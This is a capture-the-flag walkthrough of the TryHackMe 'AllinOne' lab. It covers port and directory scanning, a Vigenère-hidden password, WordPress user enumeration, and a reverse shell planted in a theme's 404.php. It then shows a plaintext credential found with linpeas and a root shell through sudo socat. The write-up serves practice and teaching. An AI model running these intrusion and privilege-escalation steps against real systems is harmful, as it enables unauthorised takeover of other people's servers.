# CTF TryHackMe - AllinOne

## Nmap
```bash
# Nmap 7.91 scan initiated Thu Jun 17 17:47:40 2021 as: nmap -sC -sV -oN nmap.log 10.10.152.162
Nmap scan report for 10.10.152.162
Host is up (0.090s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.188.66
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

## FTP

I have check the FTP, nothin interesting...

## Gobuster
```bash
gobuster dir -u http://10.10.152.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.152.162
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/17 18:01:56 Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 318] [--> http://10.10.152.162/wordpress/]
/hackathons           (Status: 200) [Size: 197]
```
## Check hackathon directory

see interesting comment in source code
```
<!-- Dvc W@iyur@123 -->
<!-- KeepGoing -->
```
the page refered to vinegrare. 

go to cyberchef and select from **vinegere decode** and specify the key : **keepgoing**

we obtain : **Try H@ckme@123**

## Check Wordpress
Using wpcan for enumeration

```bash
wpscan --url http://10.10.152.162/wordpress
```

Lets enumerate users
```bash
wpscan --url http://10.10.152.162/wordpress --enumerate u
elyana
```

Try to login to wordpress as **elyana** and using password **H@ckme@123**

It's works!!

## Wordpress Admin access
So now, let's do a reverse shell
```
Apparence > Theme Editor > Select 404 Template (404.php)
```

Replace all content by a php reverse shell 

Start a listener on attack machine
go on **http://10.10.152.162/wordpress/wp-content/themes/twentytwenty/404.php**

It works, we got a shell as www-data

## Elevating priveleges to Elyana
In **/home/elyana** we have a file **hint.txt** 
```
Elyana's user password is hidden in the system. Find it ;)
```

Using linpeas to find the hidden password
```
Output of linpeash 
/etc/mysql/conf.d/private.txt:password: E@syR18ght
```

We have ssh access :
```
elyana
E@syR18ght
```

## Privelege Escalation to Root
Check sudo permissions 

```bash
sudo -l 
Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat
```

So i used Socat, to pop a root shell
```bash
sudo socat stdin exec:/bin/sh
```

And we'r rooooot
